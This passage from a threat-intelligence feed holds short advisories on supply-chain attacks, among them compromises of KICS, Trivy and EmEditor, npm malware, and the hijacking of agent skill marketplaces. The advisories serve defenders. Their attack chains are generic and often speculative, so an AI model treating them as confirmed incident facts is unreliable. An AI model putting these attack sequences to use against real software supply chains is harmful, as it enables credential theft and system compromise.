below is based on a typical supply chain compromise scenario:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eTeamPCP gains unauthorized access to the KICS GitHub Action repository or its build process.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious code into the KICS GitHub Action. This code could be designed to exfiltrate sensitive information, modify infrastructure configurations, or establish a backdoor.\u003c/li\u003e\n\u003cli\u003eA new version of the KICS GitHub Action, containing the malicious code, is released and made available on the GitHub Marketplace.\u003c/li\u003e\n\u003cli\u003eOrganizations using the KICS GitHub Action automatically update to the compromised version through their CI/CD pipelines.\u003c/li\u003e\n\u003cli\u003eThe malicious code executes within the CI/CD environments of victim organizations, potentially gaining access to environment variables, secrets, and other sensitive data.\u003c/li\u003e\n\u003cli\u003eThe malicious code exfiltrates collected data to attacker-controlled infrastructure.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the exfiltrated data to further compromise the victim\u0026rsquo;s infrastructure or gain unauthorized access to their systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the KICS GitHub Action represents a significant supply chain risk. Organizations utilizing the compromised action in their CI/CD pipelines could have experienced exfiltration of sensitive data, including API keys, credentials, and infrastructure configurations. Successful exploitation could lead to unauthorized access to cloud resources, data breaches, and disruption of services. While the exact number of affected organizations remains unclear, the widespread use of KICS suggests a potentially large impact.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInvestigate CI/CD pipeline logs for usage of the compromised KICS GitHub Action version (refer to Overview).\u003c/li\u003e\n\u003cli\u003eAudit GitHub Action dependencies in CI/CD pipelines to identify and remove any unauthorized or suspicious actions (refer to Overview).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic originating from CI/CD environments for connections to unusual or malicious destinations (based on potential exfiltration in Attack Chain).\u003c/li\u003e\n\u003cli\u003eImplement stricter access controls and monitoring for GitHub Action repositories and build processes to prevent future supply chain attacks (refer to Overview).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule detecting suspicious script execution within GitHub Action workflows to identify potential malicious activity (see rule below).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-23T19:20:57Z","date_published":"2026-03-23T19:20:57Z","id":"/briefs/2024-06-07-teampcp-kics-supply-chain/","summary":"TeamPCP conducted a supply chain attack compromising the KICS GitHub Action, impacting users who integrated the compromised version into their CI/CD pipelines.","title":"TeamPCP Compromise of KICS GitHub Action Supply Chain","url":"https://feed.craftedsignal.io/briefs/2024-06-07-teampcp-kics-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","github","agent-skills","repository-hijacking"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA supply chain attack has been identified targeting agent skill marketplaces that utilize a link-out distribution model, specifically indexing skills via GitHub repository URLs. The vulnerability arises when original repository owners rename their GitHub accounts, making the previous username available for takeover. Attackers can claim the orphaned username, recreate the repository, and intercept all future skill downloads. A study found 121 skills forwarding to 7 vulnerable repositories, with the most-downloaded hijackable skill having over 2,000 downloads. Further analysis of 238,180 unique skills from various marketplaces revealed significant disagreement among scanners, with fail rates ranging from 3.79% to 41.93%. Additionally, live API credentials for services such as NVIDIA, ElevenLabs, Gemini, and MongoDB were found embedded within the analyzed corpus, highlighting a severe lack of security hygiene in the agent skill ecosystem. This attack highlights the risks associated with relying on external repositories and the need for robust validation mechanisms in agent skill marketplaces.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eOriginal GitHub repository owner renames their account, making the old username available.\u003c/li\u003e\n\u003cli\u003eAttacker registers the now-available GitHub username.\u003c/li\u003e\n\u003cli\u003eAttacker recreates the repository at the same URL as the original skill.\u003c/li\u003e\n\u003cli\u003eUsers download the \u0026ldquo;skill\u0026rdquo; from the marketplace, which now points to the attacker\u0026rsquo;s repository.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s repository serves malicious code instead of the original skill.\u003c/li\u003e\n\u003cli\u003eThe malicious code executes on the user\u0026rsquo;s system or agent platform.\u003c/li\u003e\n\u003cli\u003eAttackers leverage the skill to gain access to the victim\u0026rsquo;s environment.\u003c/li\u003e\n\u003cli\u003eAttackers exfiltrate sensitive data or deploy further malicious payloads.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack can compromise systems and data by delivering malicious code through hijacked agent skills. The discovery of 121 vulnerable skills and 7 vulnerable repositories demonstrates the scale of this threat. The presence of live API credentials for major services like NVIDIA, ElevenLabs, Gemini, and MongoDB within the skill corpus suggests widespread insecure development practices. Successful exploitation can lead to data breaches, system compromise, and unauthorized access to cloud services, potentially impacting numerous users and organizations relying on these agent skills. The disagreement between scanners highlights the difficulty in detecting these malicious skills, further compounding the risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement monitoring for GitHub repository ownership changes for all deployed skills to detect potential hijacking (refer to Attack Chain).\u003c/li\u003e\n\u003cli\u003ePin skills to specific commit hashes rather than mutable branch heads to ensure code integrity (refer to Attack Chain).\u003c/li\u003e\n\u003cli\u003eRequire a minimum of two independent scanners to flag a skill before treating it as confirmed malicious to reduce false positives (refer to Overview).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule below to identify potential GitHub username registration events (see \u0026ldquo;Detect GitHub Username Registration\u0026rdquo; rule).\u003c/li\u003e\n\u003cli\u003ePrefer direct-hosting marketplaces over link-out distribution models to reduce reliance on external repositories (refer to Overview).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-23T12:00:00Z","date_published":"2026-03-23T12:00:00Z","id":"/briefs/2026-03-agent-skill-hijacking/","summary":"A supply chain attack targets agent skill marketplaces by exploiting GitHub username hijacking, allowing threat actors to intercept skill downloads from vulnerable repositories, with scanners showing significant disagreement on malicious skill identification and embedded live API credentials discovered.","title":"Agent Skill Marketplace Supply Chain Attack via GitHub Account Hijacking","url":"https://feed.craftedsignal.io/briefs/2026-03-agent-skill-hijacking/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","malware","npm","canisterworm"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 21, 2026, it was reported that threat actor TeamPCP successfully deployed CanisterWorm, a malicious worm, onto the NPM package registry. This followed a compromise of Trivy, a widely-used open-source vulnerability scanner. The specifics of the Trivy compromise are not detailed in this brief, but it likely involved exploiting vulnerabilities within Trivy or its infrastructure to gain unauthorized access and the ability to publish malicious packages. The scope of this incident affects developers and organizations that rely on NPM packages and utilize Trivy in their software development lifecycle. Defenders should prioritize detecting and mitigating the spread of CanisterWorm within their environments, focusing on identifying compromised Trivy instances and monitoring for suspicious activity related to NPM package installations.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Compromise: TeamPCP gains unauthorized access to Trivy infrastructure, potentially exploiting a vulnerability or using stolen credentials.\u003c/li\u003e\n\u003cli\u003eMalware Injection: The attackers inject malicious code into a legitimate Trivy package or create a new package containing the CanisterWorm payload.\u003c/li\u003e\n\u003cli\u003eNPM Deployment: TeamPCP publishes the compromised or new package to the NPM registry, making it available for download by unsuspecting users.\u003c/li\u003e\n\u003cli\u003ePackage Installation: Developers unknowingly download and install the malicious package through NPM, integrating CanisterWorm into their projects.\u003c/li\u003e\n\u003cli\u003eWorm Propagation: CanisterWorm begins to propagate itself by infecting other NPM packages and dependencies within the compromised project.\u003c/li\u003e\n\u003cli\u003eLateral Movement: The worm replicates and spreads to other systems and projects that depend on the infected packages.\u003c/li\u003e\n\u003cli\u003ePersistence: The malware establishes persistence within infected systems to maintain its presence and continue spreading.\u003c/li\u003e\n\u003cli\u003ePayload Delivery: CanisterWorm executes its malicious payload, which could include data theft, code injection, or other harmful activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe deployment of CanisterWorm on NPM poses a significant threat to the software supply chain. Successful infection can lead to widespread compromise of applications and systems that rely on NPM packages. The specific number of victims and the full extent of damage is currently unknown, but the incident has the potential to affect numerous organizations across various sectors that utilize NPM and Trivy in their development processes. Successful exploitation could result in data breaches, service disruptions, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor NPM package installations for suspicious activity and unexpected dependencies to identify potential CanisterWorm infections.\u003c/li\u003e\n\u003cli\u003eImplement integrity checks for NPM packages to verify their authenticity and prevent the installation of tampered packages.\u003c/li\u003e\n\u003cli\u003eAnalyze process creation events for suspicious processes originating from NPM-related processes using the provided Sigma rules.\u003c/li\u003e\n\u003cli\u003eRegularly scan systems for known malware signatures to detect CanisterWorm and other potential threats.\u003c/li\u003e\n\u003cli\u003eReview and strengthen the security of your software supply chain to mitigate the risk of future attacks.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-22T10:00:00Z","date_published":"2026-03-22T10:00:00Z","id":"/briefs/2026-03-teampcp-canisterworm/","summary":"TeamPCP deployed the CanisterWorm malware on the NPM package registry following a compromise of the Trivy scanning tool.","title":"TeamPCP Deploys CanisterWorm on NPM After Trivy Compromise","url":"https://feed.craftedsignal.io/briefs/2026-03-teampcp-canisterworm/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","vulnerability-scanner","trivy"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 21, 2026, reports emerged indicating that the Trivy scanner, a popular open-source vulnerability scanner used extensively in software development and deployment pipelines, has been compromised in a supply chain attack. The specifics of the initial compromise vector remain under investigation, but the impact could be widespread due to Trivy\u0026rsquo;s integration into numerous CI/CD systems and container registries. Organizations utilizing affected versions of Trivy risk deploying vulnerable or malicious containers and software builds, creating a significant security risk. The attackers\u0026rsquo; goals are currently unknown, but possibilities include injecting malware, stealing credentials, or gaining persistent access to compromised systems.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains unauthorized access to the Trivy project\u0026rsquo;s build or distribution infrastructure (potentially via compromised credentials or a software vulnerability in the build process).\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious code into a release of the Trivy scanner. This could involve modifying existing binaries or libraries, or adding new malicious components.\u003c/li\u003e\n\u003cli\u003eThe compromised Trivy release is distributed to users through official channels, such as package managers or container registries.\u003c/li\u003e\n\u003cli\u003eDevelopers and system administrators download and install the compromised Trivy scanner as part of their regular vulnerability scanning process.\u003c/li\u003e\n\u003cli\u003eThe malicious code within Trivy executes during scans, potentially allowing the attacker to gain initial access to the target system.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised Trivy scanner to establish a reverse shell connection to a command and control (C2) server.\u003c/li\u003e\n\u003cli\u003eThe attacker performs reconnaissance on the compromised system to identify sensitive data and potential targets.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates sensitive data, deploys ransomware, or performs other malicious activities depending on their objectives.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the Trivy scanner represents a significant supply chain risk. Given Trivy\u0026rsquo;s widespread adoption, a successful attack could impact thousands of organizations across various sectors. The impact ranges from data breaches and financial losses due to ransomware to reputational damage and disruption of critical services. The exact number of affected organizations is currently unknown, but the potential scope is substantial.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement network connection monitoring and deploy the Sigma rule \u0026ldquo;Detect Suspicious Outbound Connection from Trivy\u0026rdquo; to identify potentially compromised Trivy instances attempting to communicate with malicious C2 servers.\u003c/li\u003e\n\u003cli\u003eMonitor process creations and deploy the Sigma rule \u0026ldquo;Detect Suspicious Trivy Execution\u0026rdquo; to identify anomalies in Trivy execution behavior.\u003c/li\u003e\n\u003cli\u003eImplement integrity monitoring for Trivy binaries and configuration files to detect unauthorized modifications.\u003c/li\u003e\n\u003cli\u003eConduct thorough security audits of your CI/CD pipelines and software supply chain to identify and mitigate potential vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-22T00:00:00Z","date_published":"2026-03-22T00:00:00Z","id":"/briefs/2026-03-trivy-supply-chain/","summary":"The widely used Trivy scanner has been compromised in an ongoing supply chain attack, potentially impacting numerous organizations using the tool for vulnerability management.","title":"Trivy Scanner Compromised in Supply Chain Attack","url":"https://feed.craftedsignal.io/briefs/2026-03-trivy-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","github-actions","ci/cd","tag-hijacking"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 20, 2026, a breach was reported affecting the Trivy Security Scanner GitHub Actions. The incident involved the hijacking of 75 tags associated with the project. While the exact method of tag hijacking is not detailed, the attacker\u0026rsquo;s objective was to steal CI/CD secrets. This attack could affect any project using the compromised tags in their GitHub Actions workflows. Successful exploitation allows an attacker to gain access to sensitive credentials, API keys, and other secrets stored within the CI/CD environment, leading to potential data breaches, supply chain compromise, and unauthorized access to critical systems. Defenders should focus on detecting and preventing unauthorized modifications to GitHub Action workflows and monitoring for suspicious access to CI/CD secrets.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises the GitHub repository or account with permissions to manage tags for the Trivy Security Scanner GitHub Actions.\u003c/li\u003e\n\u003cli\u003eThe attacker creates or modifies existing tags (75 in this case) to point to malicious code repositories.\u003c/li\u003e\n\u003cli\u003eUsers unknowingly include the compromised tags in their GitHub Actions workflows, triggering the malicious code during CI/CD pipeline execution.\u003c/li\u003e\n\u003cli\u003eThe malicious code executes within the user\u0026rsquo;s CI/CD environment, gaining access to environment variables and secrets.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s code exfiltrates the stolen CI/CD secrets to an external server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen secrets to gain unauthorized access to victim\u0026rsquo;s systems, cloud resources, or code repositories.\u003c/li\u003e\n\u003cli\u003eThe attacker may further compromise the victim\u0026rsquo;s infrastructure, inject malicious code into software builds, or steal sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis attack has the potential to impact a wide range of organizations that rely on the Trivy Security Scanner GitHub Actions in their CI/CD pipelines. The successful theft of CI/CD secrets can lead to significant data breaches, supply chain compromise, and unauthorized access to critical infrastructure. The scope of impact depends on the number of users affected by the compromised tags and the sensitivity of the secrets stored within their CI/CD environments. The incident could result in financial losses, reputational damage, and legal liabilities for affected organizations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReview GitHub Actions workflows for use of the compromised Trivy Security Scanner tags (reference: Overview).\u003c/li\u003e\n\u003cli\u003eImplement stricter access controls and multi-factor authentication for GitHub accounts with permissions to manage tags (reference: Attack Chain).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect suspicious script execution within GitHub Actions workflows (reference: rules).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unusual outbound connections originating from CI/CD environments, indicative of secret exfiltration (reference: rules).\u003c/li\u003e\n\u003cli\u003eImplement secrets scanning tools to detect exposed credentials and API keys within code repositories and CI/CD environments (reference: Attack Chain).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-21T12:00:00Z","date_published":"2026-03-21T12:00:00Z","id":"/briefs/2026-03-trivy-tag-hijacking/","summary":"Attackers hijacked 75 tags associated with the Trivy Security Scanner GitHub Actions to steal CI/CD secrets from users of the compromised tags.","title":"Trivy Security Scanner GitHub Actions Tag Hijacking for CI/CD Secret Theft","url":"https://feed.craftedsignal.io/briefs/2026-03-trivy-tag-hijacking/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["endpoint-management","supply-chain","cisa"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 18, 2026, CISA released an alert urging organizations to harden their endpoint management systems (EMS). This recommendation comes in the wake of a successful cyberattack against a U.S. organization where the EMS was likely leveraged. While the specific details of the attack, including the threat actor, malware used, and vulnerabilities exploited, are not disclosed, the alert underscores the critical importance of securing EMS infrastructure. These systems, designed for centralized management of endpoints, can be a high-value target for attackers seeking to gain widespread access and control over an organization\u0026rsquo;s assets. The alert emphasizes that a successful compromise of an EMS can lead to severe consequences, affecting a large number of systems and potentially causing significant operational disruption and data breaches.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Access: While the specific method is unknown, attackers likely gained initial access to a system with privileges to access the EMS. This could be achieved through credential compromise, phishing, or exploiting vulnerabilities in externally facing applications.\u003c/li\u003e\n\u003cli\u003ePrivilege Escalation: The attackers escalate privileges within the compromised system or the EMS itself to gain administrative control over the endpoint management system.\u003c/li\u003e\n\u003cli\u003eEMS Compromise: Attackers successfully compromise the endpoint management system, potentially exploiting vulnerabilities or misconfigurations within the EMS software or its underlying infrastructure.\u003c/li\u003e\n\u003cli\u003ePolicy Manipulation: Attackers modify existing policies or create new malicious policies within the EMS. These policies could be designed to execute arbitrary code, deploy malicious software, or alter system configurations on managed endpoints.\u003c/li\u003e\n\u003cli\u003eMalware Deployment: The malicious policies are deployed to managed endpoints, distributing malware across the organization\u0026rsquo;s network. This could involve deploying ransomware, backdoors, or other malicious tools.\u003c/li\u003e\n\u003cli\u003eLateral Movement: Using the compromised endpoints, attackers move laterally through the network, compromising additional systems and escalating their access.\u003c/li\u003e\n\u003cli\u003eData Exfiltration: Attackers exfiltrate sensitive data from compromised systems to an external location.\u003c/li\u003e\n\u003cli\u003eImpact: Attackers achieve their final objective, which could include data theft, system disruption, or financial gain.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of an endpoint management system can have a wide-ranging impact on an organization. Depending on the size and scope of the managed environment, hundreds or thousands of endpoints could be affected. This can lead to significant operational disruption, data breaches, financial losses, and reputational damage. Specific sectors at risk include any organization that relies on centralized endpoint management for IT operations, compliance, and security. The success of such an attack allows for widespread malware deployment, potentially leading to ransomware infections, data exfiltration, and long-term persistence within the compromised network.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable and review logs related to endpoint management system activity, focusing on policy changes, software deployments, and user authentication events, to detect anomalous behavior ([Log Source: endpoint management system logs]).\u003c/li\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) for all accounts with access to the endpoint management system to prevent unauthorized access ([Reference: CISA alert]).\u003c/li\u003e\n\u003cli\u003eRegularly patch and update the endpoint management system software and its underlying infrastructure to address known vulnerabilities ([Reference: CISA alert]).\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect suspicious process creations originating from the endpoint management system related processes ([Sigma Rule: \u0026ldquo;Detect Suspicious EMS Process Creation\u0026rdquo;]).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-19T19:45:48Z","date_published":"2026-03-19T19:45:48Z","id":"/briefs/2026-03-ems-hardening/","summary":"CISA is urging hardening of endpoint management systems following a cyberattack against a US organization, highlighting the potential for significant impact via compromised management infrastructure.","title":"CISA Urges Endpoint Management System Hardening After Cyberattack","url":"https://feed.craftedsignal.io/briefs/2026-03-ems-hardening/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["memory-exhaustion","vulnerability","denial-of-service","python","supply-chain"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical memory exhaustion vulnerability, identified as CVE-2026-33155, has been discovered in a widely used Python library downloaded approximately 29 million times per month. This vulnerability poses a significant threat to services that rely on the affected library, including Amazon SageMaker, DataHub, and acryl-datahub. The issue stems from an incomplete patch for a previous vulnerability, CVE-2025-58367, related to restricted unpickling. Organizations that applied the initial patch may…\u003c/p\u003e\n","date_modified":"2026-03-19T17:46:05Z","date_published":"2026-03-19T17:46:05Z","id":"/briefs/2026-03-memory-exhaustion-flaw/","summary":"A memory exhaustion vulnerability (CVE-2026-33155) exists in a widely used Python library, affecting services like SageMaker, DataHub, and acryl-datahub due to an incomplete patch for CVE-2025-58367, requiring pinning to version 8.6.2.","title":"Memory Exhaustion Vulnerability in Widely Used Python Library","url":"https://feed.craftedsignal.io/briefs/2026-03-memory-exhaustion-flaw/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","infostealer","windows"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA supply chain compromise involving the EmEditor text editor led to the distribution of a trojanized installer. Attackers replaced the legitimate EmEditor installer with a malicious version containing an infostealer. This compromised installer was then distributed through trusted or official channels, deceiving users into installing the malware. This incident underscores the importance of verifying software integrity, even when obtained from seemingly reputable sources, and highlights the potential for significant damage when software supply chains are targeted. The goal is to steal sensitive information from victim machines. Defenders should focus on detecting anomalous process execution and network activity following software installations.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises the EmEditor software supply chain.\u003c/li\u003e\n\u003cli\u003eA malicious EmEditor installer is created, embedding an infostealer payload.\u003c/li\u003e\n\u003cli\u003eThe trojanized installer is distributed through trusted or official EmEditor distribution channels.\u003c/li\u003e\n\u003cli\u003eUnsuspecting users download and execute the malicious installer on their Windows systems.\u003c/li\u003e\n\u003cli\u003eThe installer executes the infostealer payload in the background.\u003c/li\u003e\n\u003cli\u003eThe infostealer collects sensitive information such as credentials, browser data, and other valuable data.\u003c/li\u003e\n\u003cli\u003eThe stolen data is exfiltrated to a command-and-control server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen information for further malicious activities, such as account compromise or data theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe EmEditor supply chain compromise resulted in the distribution of an infostealer to an unknown number of users. Victims who downloaded and installed the trojanized EmEditor installer had their sensitive information stolen, potentially leading to financial loss, identity theft, and further compromise of their systems and accounts. The software supply chain compromise can erode trust in legitimate software vendors and distribution channels.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement robust software integrity verification mechanisms, such as checking digital signatures and file hashes, before installing any software (reference: overview).\u003c/li\u003e\n\u003cli\u003eMonitor for unusual process execution and network connections after software installations to detect potential post-compromise activity (reference: attack chain).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided below to detect potential infostealer activity and malicious installer execution (reference: rules).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-19T00:00:00Z","date_published":"2026-03-19T00:00:00Z","id":"/briefs/2026-03-emeditor-supply-chain/","summary":"A trojanized EmEditor installer was distributed through a trusted source, delivering an infostealer, highlighting how attackers exploit legitimate software distribution channels to bypass user trust and security controls.","title":"EmEditor Supply Chain Compromise Delivering Infostealer","url":"https://feed.craftedsignal.io/briefs/2026-03-emeditor-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["dll-injection","chrome-hijacking","com-abuse","supply-chain"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe GlassWorm threat involves sophisticated techniques like DLL injection and Chrome hijacking through COM abuse. Analysis confirms a full supply chain loop, indicating a well-coordinated and potentially widespread attack. The specifics of initial compromise and broader targeting remain unclear, but the technical capabilities displayed suggest a threat actor with significant resources and expertise. This threat necessitates immediate attention from detection engineering teams to identify and mitigate potential intrusions within their environments. The confirmation of a full supply chain loop also highlights the potential for widespread compromise affecting numerous downstream victims.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial compromise occurs through an unidentified vector, potentially involving a supply chain attack.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes persistence on the system through an unknown method.\u003c/li\u003e\n\u003cli\u003eMalicious code is injected into a legitimate process using DLL injection.\u003c/li\u003e\n\u003cli\u003eThe injected DLL targets Google Chrome.\u003c/li\u003e\n\u003cli\u003eThe attacker abuses COM objects to hijack Chrome functionality.\u003c/li\u003e\n\u003cli\u003eThe hijacked Chrome instance is used to steal user credentials and sensitive data.\u003c/li\u003e\n\u003cli\u003eExfiltrated data is sent to attacker-controlled servers.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains a foothold for further exploitation or lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful GlassWorm attack can lead to the compromise of sensitive data, including user credentials, financial information, and proprietary data. The Chrome hijacking aspect allows attackers to monitor user activity, intercept communications, and potentially inject malicious content into web pages. The confirmation of a full supply chain loop suggests the potential for a large number of victims, depending on the scope and duration of the attack. The sector impact is currently unknown, but any organization relying on Chrome for sensitive operations is at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for suspicious DLL loads into Chrome processes using the \u0026ldquo;Detect Suspicious Chrome DLL Injection\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any unusual COM object activity associated with Chrome, focusing on unexpected object creation or modification (leverage existing COM auditing capabilities, if available).\u003c/li\u003e\n\u003cli\u003eAnalyze network traffic for unexpected data exfiltration patterns originating from Chrome processes.\u003c/li\u003e\n\u003cli\u003eImplement strong endpoint detection and response (EDR) solutions to detect and prevent DLL injection attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-17T15:03:41Z","date_published":"2026-03-17T15:03:41Z","id":"/briefs/2026-03-glassworm/","summary":"The GlassWorm threat involves DLL injection and Chrome hijacking via COM abuse, confirming a full supply chain loop, potentially leading to data theft and system compromise.","title":"GlassWorm Threat: DLL Injection and Chrome Hijacking","url":"https://feed.craftedsignal.io/briefs/2026-03-glassworm/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","rat","npm","pylangghost"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA new remote access trojan (RAT) named PylangGhost has been discovered on the npm registry. This marks the first known instance of this specific RAT being distributed via a software supply chain attack on the npm ecosystem. The RAT is named for its use of Python and potentially for obfuscation or evasion techniques. The affected npm packages are designed to inject malicious code into projects that depend on them. This malicious code facilitates unauthorized remote access to infected systems, thereby providing threat actors with the ability to exfiltrate sensitive data, deploy further malware, or perform other malicious activities. This is a supply chain attack that endangers developers and applications.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA developer installs a malicious package from the npm registry containing PylangGhost.\u003c/li\u003e\n\u003cli\u003eDuring the installation process, a post-install script or similar mechanism executes, injecting the PylangGhost RAT into the developer\u0026rsquo;s environment.\u003c/li\u003e\n\u003cli\u003eThe RAT establishes a connection to a command-and-control (C2) server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe C2 server sends commands to the infected system, instructing the RAT to perform specific actions.\u003c/li\u003e\n\u003cli\u003eThe RAT executes the commands, potentially including data exfiltration, downloading and executing additional payloads, or establishing persistence.\u003c/li\u003e\n\u003cli\u003eSensitive data, such as credentials, API keys, or source code, is exfiltrated from the compromised system to the C2 server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote access and control over the compromised system, enabling further malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe presence of PylangGhost on the npm registry introduces a significant supply chain risk.  Successful infection allows attackers to gain remote access to developer systems, potentially leading to the theft of sensitive source code, credentials, and other proprietary information. The compromise can extend to applications built using the infected packages, impacting downstream users and potentially leading to widespread data breaches or service disruptions. The number of affected victims is currently unknown, but the risk is widespread due to the popularity of the npm registry.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor npm package installations for suspicious post-install scripts or unexpected network connections (see related Sigma rules).\u003c/li\u003e\n\u003cli\u003eImplement strong dependency scanning tools to identify and remove potentially malicious packages from your projects.\u003c/li\u003e\n\u003cli\u003eAnalyze network connection logs for connections to unusual or malicious domains after npm package installations (see related Sigma 